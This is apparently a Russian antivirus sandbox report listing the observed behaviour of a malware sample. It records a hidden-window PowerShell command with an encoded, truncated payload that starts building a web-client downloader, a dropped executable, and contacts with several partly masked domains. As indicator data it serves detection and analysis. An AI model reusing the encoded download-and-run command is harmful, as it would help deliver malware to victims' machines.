Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABmAF8AOQAyAF8ANwAyADcAPQAoACcAaQA1ADcAMwAnACsAJwA3ADgAJwApADsAJABuADEAXwA5AF8AMgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABJAF8AMQBfADYAMAA5AF8APQAoACcAaAB0AH...
- %HOMEPATH%\25.exe
- %HOMEPATH%\25.exe
- 'to####ilyson.com':80
- http://to####ilyson.com/xep5fMwX
- http://www.to####ilyson.com/xep5fMwX
- http://www.to####ilyson.com/
- DNS ASK to####ilyson.com
- DNS ASK cl#####.nashikclick.com
- DNS ASK ge####riftnu.com
- DNS ASK ky####daotao.com
- DNS ASK sa####anriverdi.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABmAF8AOQAyAF8ANwAyADcAPQAoACcAaQA1ADcAMwAnACsAJwA3ADgAJwApADsAJABuADEAXwA5AF8AMgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABJAF8AMQBfADYAMAA5AF8APQAoACcAaAB0AH...' (со скрытым окном)